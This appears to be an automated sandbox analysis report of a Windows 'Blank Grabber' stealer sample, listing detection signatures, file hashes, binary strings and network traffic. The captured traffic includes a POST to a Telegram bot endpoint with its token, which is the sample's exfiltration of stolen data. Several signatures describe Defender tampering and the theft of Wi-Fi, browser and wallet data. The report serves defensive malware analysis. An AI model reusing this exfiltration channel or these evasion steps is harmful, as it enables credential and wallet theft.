Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Sample name: #U202f#U202f#U2005#U00a0.scr.exe
renamed because original name is a hash value
Original sample name: .scr.exe
Analysis ID: 1487425
MD5: d87b402b821fa842d89283aa8654d9c0
SHA1: 30c086651e1bcd191163c01efbab55f51ec04691
SHA256: 791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
Tags: exe

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (RTLO)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]

AV Detection

Source: #U202f#U202f#U2005#U00a0.scr.exe Avira: detected
Source: #U202f#U202f#U2005#U00a0.scr.exe ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe Virustotal: Detection: 72%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: #U202f#U202f#U2005#U00a0.scr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 68_2_00007FF7F7E9901C
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose, 0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA, 68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 68_2_00007FF7F7E9E21C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 692816User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=6d93bc963fb1d0e6724c699c271a2303
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.co
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 